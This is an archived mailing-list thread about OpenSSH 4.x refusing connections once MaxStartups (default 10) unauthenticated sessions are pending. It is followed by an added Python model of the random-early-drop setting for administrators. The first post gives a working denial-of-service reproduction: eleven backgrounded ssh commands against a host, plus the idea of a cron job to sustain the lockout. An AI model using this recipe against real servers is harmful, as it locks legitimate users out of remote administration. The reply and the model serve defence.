OpenSSH 4.X DoS (maybe...)


OpenSSH 4.X DoS (maybe...)

by sipherr


OpenSSH 4.X denies remote connections.

The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.

To reproduce:

telnet 3.1.33.7 22
Trying 3.1.33.7...
Connected to 3.1.33.7.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7p1 Debian-2

Protocol mismatch.
Connection closed by foreign host.

darkstar# ssh 3.1.33.7
The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established.
RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts.
root@...'s password:

darkstar# ssh 3.1.33.7

darkstar# ssh 3.1.33.7 &
[1] 12945
darkstar# ssh 3.1.33.7 &
[2] 12946
darkstar# ssh 3.1.33.7 &
[3] 12947
darkstar# ssh 3.1.33.7 &
[4] 12948
darkstar# ssh 3.1.33.7 &
[5] 12949
darkstar# ssh 3.1.33.7 &
[6] 12950
darkstar# ssh 3.1.33.7 &
[7] 12951
darkstar# ssh 3.1.33.7 &
[8] 12952
darkstar# ssh 3.1.33.7 &
[9] 12953
darkstar# ssh 3.1.33.7 &
[10] 12954
darkstar# ssh 3.1.33.7 &
[11] 12955
darkstar#

ssh_exchange_identification: Connection closed by remote host

An attacker could cronjob a script to force this condition to remain true.

This will deny anyone else from connecting to the service. Normal behaviour?


Shouts: burnout,spithash princess^pookie, #codemasters

Re: OpenSSH 4.X DoS (maybe...)

by Eygene Ryabinkin-2


Tue, Feb 26, 2008 at 10:13:50PM -0000, sipherr@... wrote:
> OpenSSH 4.X denies remote connections.
>
> The service itself doesn't crash, but it does NOT allow anyone
> to connect after 10 or so pending connections.

Because the default value for MaxStartups is 10.  This is documented
in the sshd_config manual page.  To overcome this, the simplest
thing is to enable random early drop.  More sophisticated preventive
methods will track source IPs and disable them at the firewall
level.  If your DoS is distributed, then even more sophisticated
methods should be applied.  As usual...
--
Eygene
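
The following is an added example, not part of this thread and not OpenSSH's own code. It models the MaxStartups behaviour Eygene refers to so an administrator can see why the bare default of 10 (the value the reply cites for 4.x) turns into a full lockout at the 11th pending connection, while the three-field form `start:rate:full` ("random early drop", as described in sshd_config(5)) only refuses a growing percentage of new unauthenticated connections until `full` is reached. The parser, the `MaxStartups` type, the sample config text and the helper names are all constructed for this example; the linear drop-probability formula is written to match the manual page's description and is an assumption about sshd's exact rounding.

```python
"""Model sshd's MaxStartups throttling from a config file (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class MaxStartups:
    """Parsed MaxStartups value: refuse starts at `start` pending
    unauthenticated connections, with `rate` percent probability, rising
    linearly to 100 percent at `full`."""
    start: int
    rate: int
    full: int


def parse_max_startups(value: str) -> MaxStartups:
    """Accept either the bare form "10" or the "start:rate:full" form.
    A bare number means: refuse everything once that many are pending."""
    parts = value.strip().split(":")
    if len(parts) == 1:
        n = int(parts[0])
        return MaxStartups(start=n, rate=100, full=n)
    if len(parts) == 3:
        start, rate, full = (int(p) for p in parts)
        if not (0 < start <= full) or not (0 <= rate <= 100):
            raise ValueError(f"invalid MaxStartups value: {value!r}")
        return MaxStartups(start, rate, full)
    raise ValueError(f"invalid MaxStartups value: {value!r}")


def read_max_startups(config_text: str) -> MaxStartups:
    """Find MaxStartups in sshd_config text. sshd_config(5) states that for
    each keyword the first obtained value is used, so the first match wins.
    Falls back to the 4.x default of 10 mentioned in the reply above."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        fields = line.replace("=", " ", 1).split(None, 1)
        if len(fields) == 2 and fields[0].lower() == "maxstartups":
            return parse_max_startups(fields[1])
    return MaxStartups(start=10, rate=100, full=10)


def drop_probability(pending: int, ms: MaxStartups) -> int:
    """Percent chance that a new unauthenticated connection is refused when
    `pending` connections are already waiting for authentication.
    Assumed linear interpolation between `rate` at `start` and 100 at `full`."""
    if pending < ms.start:
        return 0
    if pending >= ms.full or ms.rate == 100:
        return 100
    span = ms.full - ms.start
    return (100 - ms.rate) * (pending - ms.start) // span + ms.rate


# Constructed sample configs: the 4.x default (lockout) vs. random early drop.
DEFAULT_CONFIG = """\
# sshd_config excerpt (constructed sample) - no MaxStartups line, so the
# compiled-in default of 10 applies.
Port 22
PermitRootLogin no
"""

HARDENED_CONFIG = """\
# sshd_config excerpt (constructed sample) with random early drop:
# start refusing 30% of new connections at 10 pending, refuse all at 100.
Port 22
PermitRootLogin no
MaxStartups 10:30:100
"""


def lockout_report(config_text: str, pending_levels=(9, 10, 11, 55, 100)) -> dict:
    """Map each pending-connection count to the refusal percentage a new,
    legitimate client would face under the given config."""
    ms = read_max_startups(config_text)
    return {n: drop_probability(n, ms) for n in pending_levels}


if __name__ == "__main__":
    for name, cfg in (("default", DEFAULT_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, read_max_startups(cfg), lockout_report(cfg))
```

Running it shows the contrast the reply describes: under the bare default, 11 parked connections (the thread's scenario) give a 100% refusal rate for everyone else, whereas with `10:30:100` the same 11 connections cost a legitimate client only a 30% chance of being refused on a given attempt, and the attacker must hold 100 unauthenticated sessions open at once to reach the same lockout. Pair this with `LoginGraceTime`, which bounds how long each unauthenticated session can be parked, and with the firewall-level source tracking Eygene mentions.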